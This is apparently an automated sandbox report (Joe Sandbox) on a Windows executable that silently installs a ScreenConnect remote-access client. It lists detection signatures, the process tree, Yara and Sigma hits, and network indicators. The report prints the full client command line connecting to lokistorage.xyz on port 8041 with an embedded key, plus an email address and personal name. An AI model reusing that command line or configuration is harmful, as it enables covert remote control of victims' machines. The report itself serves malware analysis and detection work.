Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lat0Kwfbuj.exe

Overview

General Information

Sample name:lat0Kwfbuj.exe
renamed because original name is a hash value
Original sample name:723553540a5bdd7ae07408bceef12e9b4feb1b572a5c0d30c251fe2bdf4bc5bf.exe
Analysis ID:1554617
MD5:51f8a6e0438ee3b616c5768326a30ede
SHA1:4f46a0f80fd001cff87f747ce43551aae8da15c4
SHA256:723553540a5bdd7ae07408bceef12e9b4feb1b572a5c0d30c251fe2bdf4bc5bf
Tags:95-164-16-15exelokistorage-xyzuser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score:50
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Performs DNS queries to domains with low reputation
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • lat0Kwfbuj.exe (PID: 5880 cmdline: "C:\Users\user\Desktop\lat0Kwfbuj.exe" MD5: 51F8A6E0438EE3B616C5768326A30EDE)
    • msiexec.exe (PID: 5700 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7088 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 1220 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding AEF3BD45AE3AC68FA3C1F0BB226B94AD C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 2620 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI805D.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4752015 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 2300 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 1AEB7D6AE800B379962CD8E66BA70200 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 5588 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 297D060039D81CAE5710DC99E60A4A0C E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 6504 cmdline: "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=8c30d271-264f-488c-94af-041784a36368&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=michalgasper2%40gmail.com&c=kristof%20horvat&c=&c=&c=&c=&c=&c=&c=" MD5: 826314610D9E854477B08666330940B5)
    • ScreenConnect.WindowsClient.exe (PID: 320 cmdline: "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "b15bf990-c25d-4951-af9a-ebda90b58672" "User" MD5: AB5FA8D90645878D587F386D0E276C02)
    • ScreenConnect.WindowsClient.exe (PID: 5900 cmdline: "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "61fcd7ba-9a06-4116-a3ec-642fd4d2ceac" "System" MD5: AB5FA8D90645878D587F386D0E276C02)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
lat0Kwfbuj.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Config.Msi\48861a.rbsJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Windows\Installer\MSI884C.tmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.2222155530.0000000005600000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            00000009.00000000.2257604970.00000000004F2000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              00000009.00000002.3438865774.00000000026A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                00000000.00000002.2207287516.0000000002C61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  0000000A.00000002.2611494645.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    Click to see the 4 entries
                    SourceRuleDescriptionAuthorStrings
                    0.2.lat0Kwfbuj.exe.5600000.7.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      9.0.ScreenConnect.WindowsClient.exe.4f0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        9.2.ScreenConnect.WindowsClient.exe.271fa18.0.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          10.2.ScreenConnect.WindowsClient.exe.301fa50.4.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                            0.2.lat0Kwfbuj.exe.5600000.7.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                              Click to see the 4 entries

                              System Summary

                              barindex
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=8c30d271-264f-488c-94af-041784a36368&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=michalgasper2%40gmail.com&c=kristof%20horvat&c=&c=&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=8c30d271-264f-488c-94af-041784a36368&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=michalgasper2%40gmail.com&c=kristof%20horvat&c=&c=&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=8c30d271-264f-488c-94af-041784a36368&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=michalgasper2%40gmail.com&c=kristof%20horvat&c=&c=&c=&c=&c=&c=&c=", ProcessId: 6504, ProcessName: ScreenConnect.ClientService.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (20ae101cef0f1acf) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7088, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\(Default)
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-11-12T18:40:29.296821+010020229301A Network Trojan was detected20.12.23.50443192.168.2.649775TCP
                              2024-11-12T18:41:06.957976+010020229301A Network Trojan was detected20.12.23.50443192.168.2.649801TCP

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: lat0Kwfbuj.exeReversingLabs: Detection: 21%
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 86.9% probability
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_04641678 CryptProtectData,8_2_04641678
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_04641671 CryptProtectData,8_2_04641671
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_05EE0AA0 CryptUnprotectData,8_2_05EE0AA0
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeEXE: msiexec.exeJump to behavior

                              Compliance

                              barindex
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeEXE: msiexec.exeJump to behavior
                              Source: lat0Kwfbuj.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: lat0Kwfbuj.exeStatic PE information: certificate valid
                              Source: lat0Kwfbuj.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: lat0Kwfbuj.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: lat0Kwfbuj.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdbU! source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3438865774.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611032086.0000000002DD2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2610882660.0000000002D80000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611494645.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbI source: lat0Kwfbuj.exe
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3453134317.0000000003047000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2617646955.0000000012FB0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: lat0Kwfbuj.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3438865774.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611032086.0000000002DD2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2610882660.0000000002D80000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611494645.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: lat0Kwfbuj.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.2245197043.000000000029D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: lat0Kwfbuj.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.2221560120.0000000004B2B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: lat0Kwfbuj.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.2221560120.0000000004ABA000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: lat0Kwfbuj.exe, MSI8C55.tmp.3.dr, 488619.msi.3.dr, MSI884C.tmp.3.dr, 48861b.msi.3.dr, MSI888B.tmp.3.dr, setup.msi.0.dr, 48861a.rbs.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3453134317.0000000003047000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2617646955.0000000012FB0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2257604970.00000000004F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: lat0Kwfbuj.exe, MSI805D.tmp.2.dr, 488619.msi.3.dr, 48861b.msi.3.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611213053.0000000002F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.3453134317.0000000003047000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2617646955.0000000012FB0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: lat0Kwfbuj.exe
                              Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                              Networking

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                              Source: DNS query: lokistorage.xyz
                              Source: global trafficTCP traffic: 192.168.2.6:49723 -> 95.164.16.15:8041
                              Source: Joe Sandbox ViewASN Name: NASSIST-ASGI NASSIST-ASGI
                              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.6:49775
                              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.6:49801
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: lokistorage.xyz
                              Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2617646955.0000000012FB0000.00000004.00000800.00020000.00000000.sdmp, lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2617646955.0000000012FB0000.00000004.00000800.00020000.00000000.sdmp, lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.3441561097.00000000022A9000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611494645.0000000003427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: rundll32.exe, 00000005.00000003.2221560120.0000000004ABA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2221560120.0000000004B2B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
